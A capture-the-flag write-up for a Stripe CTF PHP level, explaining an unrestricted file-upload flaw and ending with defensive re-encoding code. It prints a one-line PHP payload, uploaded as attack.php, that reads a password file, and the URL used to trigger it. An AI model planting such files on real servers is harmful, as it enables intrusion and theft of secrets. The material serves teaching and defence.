This is another PHP level, where they emulate a little social network that lets you upload an image to use for your profile. This level shows what goes wrong if you don’t force an output file type for uploaded content.
The hint really is that you can upload a file to use as an image.
The problem in the code is how they handle the upload. They just take the file, move it into the uploads/ directory, and keep the name of the file you uploaded, so a .php file stays a .php file and the server will run it when it is requested. Generally, if you accept images, you’d want to convert anything uploaded into a JPEG.
So this is a pretty simple one. Create a file called something like attack.php with the following contents in it:
<?php echo file_get_contents("../password.txt");
Uploading it puts the file at uploads/attack.php, so you can fire up your browser and hit the following page:
https://level02-4.stripe-ctf.com/user-cnfowzkbbk/uploads/attack.php
It will spit out the contents of password.txt.
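
The fix mentioned above (convert anything uploaded into a JPEG), as an added example that is not the level's own code. The function name store_profile_image, the avatar form field, the size limit and the directory layout are assumptions, and the GD extension is required:

```php
<?php
// Added example, not the CTF level's code. store_profile_image(), the
// 'avatar' field and the 2 MiB limit are assumptions for illustration.

// Re-encode an uploaded file as a JPEG under a server-chosen name.
// Returns the stored file name, or null if the upload is not a decodable image.
function store_profile_image(array $file, string $uploadDir): ?string
{
    // Only accept files that really arrived through an HTTP POST upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Cap the size before handing the bytes to the image decoder.
    if (filesize($file['tmp_name']) > 2 * 1024 * 1024) {
        return null;
    }
    $bytes = file_get_contents($file['tmp_name']);
    if ($bytes === false) {
        return null;
    }
    // Decode with GD. A PHP script, or anything else that is not an image,
    // fails here and is never written into the upload directory.
    $img = @imagecreatefromstring($bytes);
    if ($img === false) {
        return null;
    }
    // Never reuse $file['name']: the client controls it, extension included.
    $name = bin2hex(random_bytes(16)) . '.jpg';
    // Writing freshly encoded pixels drops comments, metadata and trailing
    // data that were in the original bytes.
    $ok = imagejpeg($img, rtrim($uploadDir, '/') . '/' . $name, 85);
    return $ok ? $name : null;
}

// Usage inside the upload handler.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['avatar'])) {
    $stored = store_profile_image($_FILES['avatar'], __DIR__ . '/uploads');
    if ($stored === null) {
        http_response_code(400);
        exit('Upload rejected: not a valid image.');
    }
    echo 'Stored as uploads/' . htmlspecialchars($stored);
}
```

The server-chosen .jpg name matters as much as the re-encode, because the web server typically decides whether to run a file as PHP from its extension. Serving uploads/ with script execution disabled closes the same hole a second time.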